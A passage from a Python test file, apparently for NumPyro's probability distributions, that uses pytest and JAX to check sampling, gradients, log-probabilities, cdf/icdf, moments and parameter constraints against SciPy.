if isinstance(jax_dist, dist.TransformedDistribution):
assert jax_dist.base_dist.has_rsample
else:
assert set(jax_dist.arg_constraints) == set(jax_dist.reparametrized_params)
jax_dist.rsample(random.PRNGKey(0))
if isinstance(jax_dist, dist.Normal):
masked_dist.rsample(random.PRNGKey(0))
indept_dist.rsample(random.PRNGKey(0))
transf_dist.rsample(random.PRNGKey(0))
else:
with pytest.raises(NotImplementedError):
jax_dist.rsample(random.PRNGKey(0))
if isinstance(jax_dist, dist.BernoulliProbs):
with pytest.raises(NotImplementedError):
masked_dist.rsample(random.PRNGKey(0))
with pytest.raises(NotImplementedError):
indept_dist.rsample(random.PRNGKey(0))
with pytest.raises(NotImplementedError):
transf_dist.rsample(random.PRNGKey(0))
@pytest.mark.parametrize("batch_shape", [(), (4,), (3, 2)])
def test_unit(batch_shape):
log_factor = random.normal(random.PRNGKey(0), batch_shape)
d = dist.Unit(log_factor=log_factor)
x = d.sample(random.PRNGKey(1))
assert x.shape == batch_shape + (0,)
assert (d.log_prob(x) == log_factor).all()
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS)
def test_sample_gradient(jax_dist, sp_dist, params):
    # we have a pathwise gradient for the gamma sampler
gamma_derived_params = {
"Gamma": ["concentration"],
"Beta": ["concentration1", "concentration0"],
"BetaProportion": ["mean", "concentration"],
"Chi2": ["df"],
"Dirichlet": ["concentration"],
"InverseGamma": ["concentration"],
"LKJ": ["concentration"],
"LKJCholesky": ["concentration"],
"StudentT": ["df"],
}.get(jax_dist.__name__, [])
dist_args = [
p
for p in (
inspect.getfullargspec(jax_dist.__init__)[0][1:]
if inspect.isclass(jax_dist)
            # account for the case where jax_dist is a function
else inspect.getfullargspec(jax_dist)[0]
)
]
params_dict = dict(zip(dist_args[: len(params)], params))
jax_class = type(jax_dist(**params_dict))
reparametrized_params = [
p for p in jax_class.reparametrized_params if p not in gamma_derived_params
]
if not reparametrized_params:
pytest.skip("{} not reparametrized.".format(jax_class.__name__))
nonrepara_params_dict = {
k: v for k, v in params_dict.items() if k not in reparametrized_params
}
repara_params = tuple(
v for k, v in params_dict.items() if k in reparametrized_params
)
rng_key = random.PRNGKey(0)
def fn(args):
args_dict = dict(zip(reparametrized_params, args))
return jnp.sum(
jax_dist(**args_dict, **nonrepara_params_dict).sample(key=rng_key)
)
actual_grad = jax.grad(fn)(repara_params)
assert len(actual_grad) == len(repara_params)
eps = 1e-3
for i in range(len(repara_params)):
if repara_params[i] is None:
continue
args_lhs = [p if j != i else p - eps for j, p in enumerate(repara_params)]
args_rhs = [p if j != i else p + eps for j, p in enumerate(repara_params)]
fn_lhs = fn(args_lhs)
fn_rhs = fn(args_rhs)
# finite diff approximation
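        # central difference: df/dp_i ~= (f(p_i + eps) - f(p_i - eps)) / (2 * eps)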
expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)
assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])
assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02, atol=0.03)
@pytest.mark.parametrize(
"jax_dist, params",
[
(dist.Gamma, (1.0,)),
(dist.Gamma, (0.1,)),
(dist.Gamma, (10.0,)),
(dist.Chi2, (1.0,)),
(dist.Chi2, (0.1,)),
(dist.Chi2, (10.0,)),
(dist.Beta, (1.0, 1.0)),
(dist.StudentT, (5.0, 2.0, 4.0)),
],
)
def test_pathwise_gradient(jax_dist, params):
rng_key = random.PRNGKey(0)
N = 1000000
def f(params):
z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))
return (z + z**2).mean(0)
def g(params):
d = jax_dist(*params)
return d.mean + d.variance + d.mean**2
actual_grad = grad(f)(params)
expected_grad = grad(g)(params)
assert_allclose(actual_grad, expected_grad, rtol=0.005)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_jit_log_likelihood(jax_dist, sp_dist, params):
if jax_dist.__name__ in (
"EulerMaruyama",
"GaussianRandomWalk",
"_ImproperWrapper",
"LKJ",
"LKJCholesky",
"_SparseCAR",
):
pytest.xfail(reason="non-jittable params")
rng_key = random.PRNGKey(0)
samples = jax_dist(*params).sample(key=rng_key, sample_shape=(2, 3))
def log_likelihood(*params):
return jax_dist(*params).log_prob(samples)
expected = log_likelihood(*params)
actual = jax.jit(log_likelihood)(*params)
assert_allclose(actual, expected, atol=2e-5, rtol=2e-5)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
@pytest.mark.parametrize("prepend_shape", [(), (2,), (2, 3)])
@pytest.mark.parametrize("jit", [False, True])
def test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):
jit_fn = _identity if not jit else jax.jit
jax_dist = jax_dist(*params)
rng_key = random.PRNGKey(0)
samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)
assert jax_dist.log_prob(samples).shape == prepend_shape + jax_dist.batch_shape
truncated_dists = (
dist.LeftTruncatedDistribution,
dist.RightTruncatedDistribution,
dist.TwoSidedTruncatedDistribution,
)
if sp_dist is None:
if isinstance(jax_dist, truncated_dists):
if isinstance(params[0], dist.Distribution):
# new api
loc, scale, low, high = (
params[0].loc,
params[0].scale,
params[1],
params[2],
)
else:
# old api
loc, scale, low, high = params
if low is None:
low = -np.inf
if high is None:
high = np.inf
sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)
expected = sp_dist.logpdf(samples) - jnp.log(
sp_dist.cdf(high) - sp_dist.cdf(low)
)
assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-5)
return
pytest.skip("no corresponding scipy distn.")
if _is_batched_multivariate(jax_dist):
pytest.skip("batching not allowed in multivariate distns.")
if jax_dist.event_shape and prepend_shape:
# >>> d = sp.dirichlet([1.1, 1.1])
# >>> samples = d.rvs(size=(2,))
# >>> d.logpdf(samples)
# ValueError: The input vector 'x' must lie within the normal simplex ...
pytest.skip("batched samples cannot be scored by multivariate distributions.")
sp_dist = sp_dist(*params)
try:
expected = sp_dist.logpdf(samples)
except AttributeError:
expected = sp_dist.logpmf(samples)
except ValueError as e:
# precision issue: jnp.sum(x / jnp.sum(x)) = 0.99999994 != 1
if "The input vector 'x' must lie within the normal simplex." in str(e):
samples = jax.device_get(samples).astype("float64")
samples = samples / samples.sum(axis=-1, keepdims=True)
expected = sp_dist.logpdf(samples)
else:
raise e
assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-5)
def test_mixture_log_prob():
gmm = dist.MixtureSameFamily(
dist.Categorical(logits=np.zeros(2)), dist.Normal(0, 1).expand([2])
)
actual = gmm.log_prob(0.0)
expected = dist.Normal(0, 1).log_prob(0.0)
assert_allclose(actual, expected)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params",
# TODO: add more complete pattern for Discrete.cdf
CONTINUOUS + [T(dist.Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))],
)
@pytest.mark.filterwarnings("ignore:overflow encountered:RuntimeWarning")
def test_cdf_and_icdf(jax_dist, sp_dist, params):
d = jax_dist(*params)
if d.event_dim > 0:
pytest.skip("skip testing cdf/icdf methods of multivariate distributions")
samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))
quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())
try:
rtol = 2e-3 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-5
if d.shape() == () and not d.is_discrete:
assert_allclose(
jax.vmap(jax.grad(d.cdf))(samples),
jnp.exp(d.log_prob(samples)),
atol=1e-5,
rtol=rtol,
)
assert_allclose(
jax.vmap(jax.grad(d.icdf))(quantiles),
jnp.exp(-d.log_prob(d.icdf(quantiles))),
atol=1e-5,
rtol=rtol,
)
assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-5, rtol=1e-5)
assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-5, rtol=rtol)
except NotImplementedError:
pass
# test against scipy
if not sp_dist:
pytest.skip("no corresponding scipy distn.")
sp_dist = sp_dist(*params)
try:
actual_cdf = d.cdf(samples)
expected_cdf = sp_dist.cdf(samples)
assert_allclose(actual_cdf, expected_cdf, atol=1e-5, rtol=1e-5)
actual_icdf = d.icdf(quantiles)
expected_icdf = sp_dist.ppf(quantiles)
assert_allclose(actual_icdf, expected_icdf, atol=1e-4, rtol=1e-4)
except NotImplementedError:
pass
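# Goodness-of-fit: draw a large sample from each distribution and check, per
# batch element, that the samples are consistent with exp(log_prob); the
# statistic returned by auto_goodness_of_fit must exceed TEST_FAILURE_RATE.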
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS + DIRECTIONAL)
def test_gof(jax_dist, sp_dist, params):
if "Improper" in jax_dist.__name__:
pytest.skip("distribution has improper .log_prob()")
if "LKJ" in jax_dist.__name__:
pytest.xfail("incorrect submanifold scaling")
if jax_dist is dist.EulerMaruyama:
d = jax_dist(*params)
if d.event_dim > 1:
pytest.skip("EulerMaruyama skip test when event shape is non-trivial.")
num_samples = 10000
if "BetaProportion" in jax_dist.__name__:
num_samples = 20000
rng_key = random.PRNGKey(0)
d = jax_dist(*params)
samples = d.sample(key=rng_key, sample_shape=(num_samples,))
probs = np.exp(d.log_prob(samples))
dim = None
if jax_dist is dist.ProjectedNormal:
dim = samples.shape[-1] - 1
# Test each batch independently.
probs = probs.reshape(num_samples, -1)
samples = samples.reshape(probs.shape + d.event_shape)
if "Dirichlet" in jax_dist.__name__:
# The Dirichlet density is over all but one of the probs.
samples = samples[..., :-1]
for b in range(probs.shape[1]):
try:
gof = auto_goodness_of_fit(samples[:, b], probs[:, b], dim=dim)
except InvalidTest:
pytest.skip("expensive test")
else:
assert gof > TEST_FAILURE_RATE
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS + DISCRETE)
def test_independent_shape(jax_dist, sp_dist, params):
d = jax_dist(*params)
batch_shape, event_shape = d.batch_shape, d.event_shape
shape = batch_shape + event_shape
for i in range(len(batch_shape)):
indep = dist.Independent(d, reinterpreted_batch_ndims=i)
sample = indep.sample(random.PRNGKey(0))
event_boundary = len(shape) - len(event_shape) - i
assert indep.batch_shape == shape[:event_boundary]
assert indep.event_shape == shape[event_boundary:]
assert jnp.shape(indep.log_prob(sample)) == shape[:event_boundary]
def _tril_cholesky_to_tril_corr(x):
w = vec_to_tril_matrix(x, diagonal=-1)
diag = jnp.sqrt(1 - jnp.sum(w**2, axis=-1))
cholesky = w + jnp.expand_dims(diag, axis=-1) * jnp.identity(w.shape[-1])
corr = jnp.matmul(cholesky, cholesky.T)
return matrix_to_tril_vec(corr, diagonal=-1)
@pytest.mark.parametrize("dimension", [2, 3, 5])
def test_log_prob_LKJCholesky_uniform(dimension):
# When concentration=1, the distribution of correlation matrices is uniform.
# We will test that fact here.
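    # Under the change of variables corr = f(cholesky), densities satisfy
    # log p_corr(corr) = log p_chol(cholesky) - log|det J_f|, so a constant value of
    # (log_prob - cholesky_to_corr_jac) across samples indicates a uniform density over
    # correlation matrices.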
d = dist.LKJCholesky(dimension=dimension, concentration=1)
N = 5
corr_log_prob = []
for i in range(N):
sample = d.sample(random.PRNGKey(i))
log_prob = d.log_prob(sample)
sample_tril = matrix_to_tril_vec(sample, diagonal=-1)
cholesky_to_corr_jac = np.linalg.slogdet(
jax.jacobian(_tril_cholesky_to_tril_corr)(sample_tril)
)[1]
corr_log_prob.append(log_prob - cholesky_to_corr_jac)
corr_log_prob = np.array(corr_log_prob)
# test if they are constant
assert_allclose(
corr_log_prob,
jnp.broadcast_to(corr_log_prob[0], corr_log_prob.shape),
rtol=1e-6,
)
if dimension == 2:
        # When concentration = 1, LKJ gives a uniform distribution over correlation matrices,
        # hence for dimension = 2 the single off-diagonal entry is distributed Uniform(-1, 1),
        # whose density is 0.5.
        # In addition, the jacobian of the transformation cholesky -> corr is 1 (hence its
        # log value is 0) because the off-diagonal lower-triangular element does not change
        # under the transform.
        # So target_log_prob = log(0.5).
assert_allclose(corr_log_prob[0], jnp.log(0.5), rtol=1e-6)
@pytest.mark.parametrize("dimension", [2, 3, 5])
@pytest.mark.parametrize("concentration", [0.6, 2.2])
def test_log_prob_LKJCholesky(dimension, concentration):
    # We will test against the fact that LKJCorrCholesky can be seen as a
    # TransformedDistribution whose base distribution is a distribution of partial
    # correlations in the C-vine method (modulo an affine transform to change the domain
    # from (0, 1) to (-1, 1)) and whose transform is a signed stick-breaking process.
d = dist.LKJCholesky(dimension, concentration, sample_method="cvine")
beta_sample = d._beta.sample(random.PRNGKey(0))
beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))
partial_correlation = 2 * beta_sample - 1
affine_logdet = beta_sample.shape[-1] * jnp.log(2)
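    # partial_correlation = 2 * beta_sample - 1 maps (0, 1) -> (-1, 1); each coordinate
    # contributes log|d(2b - 1)/db| = log(2), giving shape[-1] * log(2) in total.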
sample = signed_stick_breaking_tril(partial_correlation)
# compute signed stick breaking logdet
inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2 # noqa: E731
inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(partial_correlation)))
unconstrained = inv_tanh(partial_correlation)
corr_cholesky_logdet = biject_to(constraints.corr_cholesky).log_abs_det_jacobian(
unconstrained, sample
)
signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet
actual_log_prob = d.log_prob(sample)
expected_log_prob = beta_log_prob - affine_logdet - signed_stick_breaking_logdet
assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-5)
assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-6)
def test_zero_inflated_logits_probs_agree():
concentration = np.exp(np.random.normal(1))
rate = np.exp(np.random.normal(1))
d = dist.GammaPoisson(concentration, rate)
gate_logits = np.random.normal(0)
gate_probs = expit(gate_logits)
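    # expit maps the gate logits to probabilities, so both parameterizations describe the
    # same zero-inflation gate and must give identical log-probabilities.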
zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)
zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)
sample = np.random.randint(
0,
20,
(
1000,
100,
),
)
assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))
@pytest.mark.parametrize("rate", [0.1, 0.5, 0.9, 1.0, 1.1, 2.0, 10.0])
def test_ZIP_log_prob(rate):
# if gate is 0 ZIP is Poisson
zip_ = dist.ZeroInflatedPoisson(0.0, rate)
pois = dist.Poisson(rate)
s = zip_.sample(random.PRNGKey(0), (20,))
zip_prob = zip_.log_prob(s)
pois_prob = pois.log_prob(s)
assert_allclose(zip_prob, pois_prob, rtol=1e-6)
# if gate is 1 ZIP is Delta(0)
zip_ = dist.ZeroInflatedPoisson(1.0, rate)
delta = dist.Delta(0.0)
s = np.array([0.0, 1.0])
zip_prob = zip_.log_prob(s)
delta_prob = delta.log_prob(s)
assert_allclose(zip_prob, delta_prob, rtol=1e-6)
@pytest.mark.parametrize("total_count", [1, 2, 3, 10])
@pytest.mark.parametrize("shape", [(1,), (3, 1), (2, 3, 1)])
def test_beta_binomial_log_prob(total_count, shape):
concentration0 = np.exp(np.random.normal(size=shape))
concentration1 = np.exp(np.random.normal(size=shape))
value = jnp.arange(1 + total_count)
num_samples = 100000
probs = np.random.beta(concentration1, concentration0, size=(num_samples,) + shape)
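    # Monte Carlo estimate of the marginal likelihood:
    # log E_p[Binomial(value | p)] ~= logsumexp_i(log Binomial(value | p_i)) - log(num_samples).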
log_probs = dist.Binomial(total_count, probs).log_prob(value)
expected = logsumexp(log_probs, 0) - jnp.log(num_samples)
actual = dist.BetaBinomial(concentration1, concentration0, total_count).log_prob(
value
)
assert_allclose(actual, expected, rtol=0.02)
@pytest.mark.parametrize("total_count", [1, 2, 3, 10])
@pytest.mark.parametrize("batch_shape", [(1,), (3, 1), (2, 3, 1)])
def test_dirichlet_multinomial_log_prob(total_count, batch_shape):
event_shape = (3,)
concentration = np.exp(np.random.normal(size=batch_shape + event_shape))
# test on one-hots
value = total_count * jnp.eye(event_shape[-1]).reshape(
event_shape + (1,) * len(batch_shape) + event_shape
)
num_samples = 100000
probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (num_samples, 1))
log_probs = dist.Multinomial(total_count, probs).log_prob(value)
expected = logsumexp(log_probs, 0) - jnp.log(num_samples)
actual = dist.DirichletMultinomial(concentration, total_count).log_prob(value)
assert_allclose(actual, expected, rtol=0.05)
@pytest.mark.parametrize("shape", [(1,), (3, 1), (2, 3, 1)])
def test_gamma_poisson_log_prob(shape):
gamma_conc = np.exp(np.random.normal(size=shape))
gamma_rate = np.exp(np.random.normal(size=shape))
value = jnp.arange(15)
num_samples = 300000
poisson_rate = np.random.gamma(
gamma_conc, 1 / gamma_rate, size=(num_samples,) + shape
)
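    # GammaPoisson is a Poisson with its rate marginalized over a Gamma prior; estimate the
    # marginal pmf by averaging Poisson likelihoods over sampled rates (logsumexp - log N).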
log_probs = dist.Poisson(poisson_rate).log_prob(value)
expected = logsumexp(log_probs, 0) - jnp.log(num_samples)
actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)
assert_allclose(actual, expected, rtol=0.05)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_log_prob_gradient(jax_dist, sp_dist, params):
if jax_dist in [dist.LKJ, dist.LKJCholesky]:
pytest.skip("we have separated tests for LKJCholesky distribution")
if jax_dist is _ImproperWrapper:
pytest.skip("no param for ImproperUniform to test for log_prob gradient")
rng_key = random.PRNGKey(0)
value = jax_dist(*params).sample(rng_key)
def fn(*args):
return jnp.sum(jax_dist(*args).log_prob(value))
eps = 1e-3
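    # Compare autodiff gradients against a central finite-difference approximation,
    # (f(theta + eps) - f(theta - eps)) / (2 * eps), which has O(eps^2) error.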
for i in range(len(params)):
if jax_dist is dist.EulerMaruyama and i == 1:
# skip taking grad w.r.t. sde_fn
continue
if jax_dist is _SparseCAR and i == 3:
# skip taking grad w.r.t. adj_matrix
continue
if isinstance(
params[i], dist.Distribution
): # skip taking grad w.r.t. base_dist
continue
if params[i] is None or jnp.result_type(params[i]) in (jnp.int32, jnp.int64):
continue
actual_grad = jax.grad(fn, i)(*params)
args_lhs = [p if j != i else p - eps for j, p in enumerate(params)]
args_rhs = [p if j != i else p + eps for j, p in enumerate(params)]
fn_lhs = fn(*args_lhs)
fn_rhs = fn(*args_rhs)
# finite diff approximation
expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)
assert jnp.shape(actual_grad) == jnp.shape(params[i])
if i == 0 and jax_dist is dist.Delta:
# grad w.r.t. `value` of Delta distribution will be 0
# but numerical value will give nan (= inf - inf)
expected_grad = 0.0
assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01, atol=0.01)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_mean_var(jax_dist, sp_dist, params):
if jax_dist is _ImproperWrapper:
pytest.skip("Improper distribution does not has mean/var implemented")
if jax_dist is FoldedNormal:
pytest.skip("Folded distribution does not has mean/var implemented")
if jax_dist is dist.EulerMaruyama:
pytest.skip("EulerMaruyama distribution does not has mean/var implemented")
if jax_dist is dist.RelaxedBernoulliLogits:
pytest.skip("RelaxedBernoulli distribution does not has mean/var implemented")
if "SineSkewed" in jax_dist.__name__:
pytest.skip("Skewed Distribution are not symmetric about location.")
if jax_dist in (
_TruncatedNormal,
_TruncatedCauchy,
dist.LeftTruncatedDistribution,
dist.RightTruncatedDistribution,
dist.TwoSidedTruncatedDistribution,
):
pytest.skip("Truncated distributions do not has mean/var implemented")
if jax_dist is dist.ProjectedNormal:
pytest.skip("Mean is defined in submanifold")
n = (
20000
if jax_dist in [dist.LKJ, dist.LKJCholesky, dist.SineBivariateVonMises]
else 200000
)
d_jax = jax_dist(*params)
k = random.PRNGKey(0)
samples = d_jax.sample(k, sample_shape=(n,)).astype(np.float32)
# check with suitable scipy implementation if available
# XXX: VonMises is already tested below
if (
sp_dist
and not _is_batched_multivariate(d_jax)
and jax_dist
not in [dist.VonMises, dist.MultivariateStudentT, dist.MatrixNormal]
):
d_sp = sp_dist(*params)
try:
sp_mean = d_sp.mean()
except TypeError: # mvn does not have .mean() method
sp_mean = d_sp.mean
# for multivariate distns try .cov first
if d_jax.event_shape:
try:
sp_var = jnp.diag(d_sp.cov())
except TypeError: # mvn does not have .cov() method
sp_var = jnp.diag(d_sp.cov)
except AttributeError:
sp_var = d_sp.var()
else:
sp_var = d_sp.var()
assert_allclose(d_jax.mean, sp_mean, rtol=0.01, atol=1e-7)
assert_allclose(d_jax.variance, sp_var, rtol=0.01, atol=1e-7)
if jnp.all(jnp.isfinite(sp_mean)):
assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05, atol=1e-2)
if jnp.all(jnp.isfinite(sp_var)):
assert_allclose(
jnp.std(samples, 0), jnp.sqrt(d_jax.variance), rtol=0.05, atol=1e-2
)
elif jax_dist in [dist.LKJ, dist.LKJCholesky]:
if jax_dist is dist.LKJCholesky:
corr_samples = jnp.matmul(samples, jnp.swapaxes(samples, -2, -1))
else:
corr_samples = samples
dimension, concentration, _ = params
# marginal of off-diagonal entries
marginal = dist.Beta(
concentration + 0.5 * (dimension - 2), concentration + 0.5 * (dimension - 2)
)
# scale statistics due to linear mapping
marginal_mean = 2 * marginal.mean - 1
marginal_std = 2 * jnp.sqrt(marginal.variance)
expected_mean = jnp.broadcast_to(
jnp.reshape(marginal_mean, jnp.shape(marginal_mean) + (1, 1)),
jnp.shape(marginal_mean) + d_jax.event_shape,
)
expected_std = jnp.broadcast_to(
jnp.reshape(marginal_std, jnp.shape(marginal_std) + (1, 1)),
jnp.shape(marginal_std) + d_jax.event_shape,
)
# diagonal elements of correlation matrices are 1
expected_mean = expected_mean * (1 - jnp.identity(dimension)) + jnp.identity(
dimension
)
expected_std = expected_std * (1 - jnp.identity(dimension))
assert_allclose(jnp.mean(corr_samples, axis=0), expected_mean, atol=0.01)
assert_allclose(jnp.std(corr_samples, axis=0), expected_std, atol=0.01)
elif jax_dist in [dist.VonMises]:
# circular mean = sample mean
assert_allclose(d_jax.mean, jnp.mean(samples, 0), rtol=0.05, atol=1e-2)
# circular variance
x, y = jnp.mean(jnp.cos(samples), 0), jnp.mean(jnp.sin(samples), 0)
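        # The circular variance is 1 - R, where R = sqrt(x**2 + y**2) is the mean resultant
        # length of the samples.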
expected_variance = 1 - jnp.sqrt(x**2 + y**2)
assert_allclose(d_jax.variance, expected_variance, rtol=0.05, atol=1e-2)
elif jax_dist in [dist.SineBivariateVonMises]:
phi_loc = _circ_mean(samples[..., 0])
psi_loc = _circ_mean(samples[..., 1])
assert_allclose(
d_jax.mean, jnp.stack((phi_loc, psi_loc), axis=-1), rtol=0.05, atol=1e-2
)
elif jax_dist in [dist.MatrixNormal]:
sample_shape = (200_000,)
# use X ~ MN(loc, U, V) then vec(X) ~ MVN(vec(loc), kron(V, U))
if len(d_jax.batch_shape) > 0:
axes = [len(sample_shape) + i for i in range(len(d_jax.batch_shape))]
axes = tuple(axes)
samples_re = jnp.moveaxis(samples, axes, jnp.arange(len(axes)))
subshape = samples_re.shape[: len(axes)]
ixi = product(*[range(k) for k in subshape])
for ix in ixi:
# mean
def get_min_shape(ix, batch_shape):
return min(ix, tuple(map(lambda x: x - 1, batch_shape)))
ix_loc = get_min_shape(ix, d_jax.loc.shape[: len(ix)])
jnp.allclose(
jnp.mean(samples_re[ix], 0),
jnp.squeeze(d_jax.mean[ix_loc]),
rtol=0.5,
atol=1e-2,
)
# cov
samples_mvn = jnp.squeeze(samples_re[ix]).reshape(
sample_shape + (-1,), order="F"
)
ix_col = get_min_shape(ix, d_jax.scale_tril_column.shape[: len(ix)])
ix_row = get_min_shape(ix, d_jax.scale_tril_row.shape[: len(ix)])
scale_tril = my_kron(
d_jax.scale_tril_column[ix_col],
d_jax.scale_tril_row[ix_row],
)
sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))
jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=1e-2)
else: # unbatched
# mean
jnp.allclose(
jnp.mean(samples, 0),
jnp.squeeze(d_jax.mean),
rtol=0.5,
atol=1e-2,
)
# cov
samples_mvn = jnp.squeeze(samples).reshape(sample_shape + (-1,), order="F")
scale_tril = my_kron(
jnp.squeeze(d_jax.scale_tril_column), jnp.squeeze(d_jax.scale_tril_row)
)
sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))
jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=1e-2)
else:
if jnp.all(jnp.isfinite(d_jax.mean)):
assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05, atol=1e-2)
if isinstance(d_jax, dist.CAR):
pytest.skip("CAR distribution does not have `variance` implemented.")
if isinstance(d_jax, dist.Gompertz):
pytest.skip("Gompertz distribution does not have `variance` implemented.")
if jnp.all(jnp.isfinite(d_jax.variance)):
assert_allclose(
jnp.std(samples, 0), jnp.sqrt(d_jax.variance), rtol=0.05, atol=1e-2
)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
@pytest.mark.parametrize("prepend_shape", [(), (2,), (2, 3)])
def test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):
if jax_dist in (
_TruncatedNormal,
_TruncatedCauchy,
_GaussianMixture,
_Gaussian2DMixture,
_GeneralMixture,
_General2DMixture,
):
pytest.skip(f"{jax_dist.__name__} is a function, not a class")
dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]
valid_params, oob_params = list(params), list(params)
key = random.PRNGKey(1)
dependent_constraint = False
for i in range(len(params)):
if (
jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky)
and dist_args[i] != "concentration"
):
continue
if "SineSkewed" in jax_dist.__name__ and dist_args[i] != "skewness":
continue
if jax_dist is dist.EulerMaruyama and dist_args[i] != "t":
continue
if (
jax_dist is dist.TwoSidedTruncatedDistribution
and dist_args[i] == "base_dist"
):
continue
if jax_dist is dist.GaussianRandomWalk and dist_args[i] == "num_steps":
continue
if (
jax_dist is dist.SineBivariateVonMises
and dist_args[i] == "weighted_correlation"
):
continue
if params[i] is None:
oob_params[i] = None
valid_params[i] = None
continue
constraint = jax_dist.arg_constraints[dist_args[i]]
if isinstance(constraint, constraints._Dependent):
dependent_constraint = True
break
key, key_gen = random.split(key)
oob_params[i] = gen_values_outside_bounds(
constraint, jnp.shape(params[i]), key_gen
)
valid_params[i] = gen_values_within_bounds(
constraint, jnp.shape(params[i]), key_gen
)
if jax_dist is dist.MultivariateStudentT:
        # As the mean is only defined for df > 1 and we instantiate
        # scipy.stats.multivariate_t with the same mean as jax_dist,
        # we need to ensure the mean is defined, so force df >= 1.
valid_params[0] += 1
if jax_dist is dist.LogUniform:
        # scipy.stats.loguniform takes parameters a and b
        # which require a > 0 and b > a.
        # gen_values_within_bounds() only generates
        # a > 0 and b > 0, so set b = a + b.
valid_params[1] += valid_params[0]
assert jax_dist(*oob_params)
# Invalid parameter values throw ValueError
if not dependent_constraint and (
jax_dist is not _ImproperWrapper and "SineSkewed" not in jax_dist.__name__
):
with pytest.raises(ValueError):
jax_dist(*oob_params, validate_args=True)
with pytest.raises(ValueError):
# test error raised under jit omnistaging
oob_params = jax.device_get(oob_params)
def dist_gen_fn():
d = jax_dist(*oob_params, validate_args=True)
return d
jax.jit(dist_gen_fn)()
d = jax_dist(*valid_params, validate_args=True)
# Test agreement of log density evaluation on randomly generated samples
# with scipy's implementation when available.
if (
sp_dist
and not _is_batched_multivariate(d)
and not (d.event_shape and prepend_shape)
):
valid_samples = gen_values_within_bounds(
d.support, size=prepend_shape + d.batch_shape + d.event_shape
)
try:
expected = sp_dist(*valid_params).logpdf(valid_samples)
except AttributeError:
expected = sp_dist(*valid_params).logpmf(valid_samples)
assert_allclose(d.log_prob(valid_samples), expected, atol=1e-5, rtol=1e-5)
    # Out-of-support samples trigger a UserWarning
oob_samples = gen_values_outside_bounds(
d.support, size=prepend_shape + d.batch_shape + d.event_shape
)
with pytest.warns(UserWarning, match="Out-of-support"):
d.log_prob(oob_samples)
with pytest.warns(UserWarning, match="Out-of-support"):
        # test that the warning works under jit omnistaging
oob_samples = jax.device_get(oob_samples)
valid_params = jax.device_get(valid_params)
def log_prob_fn():
d = jax_dist(*valid_params, validate_args=True)
return d.log_prob(oob_samples)
jax.jit(log_prob_fn)()
def test_omnistaging_invalid_param():
def f(x):
return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)
with pytest.raises(ValueError, match="got invalid"):
jax.jit(f)(0)
def test_omnistaging_invalid_sample():
def f(x):
return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)
with pytest.warns(UserWarning, match="Out-of-support"):
jax.jit(f)(0)
def test_categorical_log_prob_grad():
data = jnp.repeat(jnp.arange(3), 10)
def f(x):
return (
dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(data).sum()
)
def g(x):
return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data).sum()
x = 0.5
fx, grad_fx = jax.value_and_grad(f)(x)
gx, grad_gx = jax.value_and_grad(g)(x)
assert_allclose(fx, gx, rtol=1e-6)
assert_allclose(grad_fx, grad_gx, atol=1e-4)
def test_beta_proportion_invalid_mean():
with dist.distribution.validation_enabled(), pytest.raises(
ValueError, match=r"^BetaProportion distribution got invalid mean parameter\.$"
):
dist.BetaProportion(1.0, 1.0)
########################################
# Tests for constraints and transforms #
########################################
@pytest.mark.parametrize(
"constraint, x, expected",
[
(constraints.boolean, np.array([True, False]), np.array([True, True])),
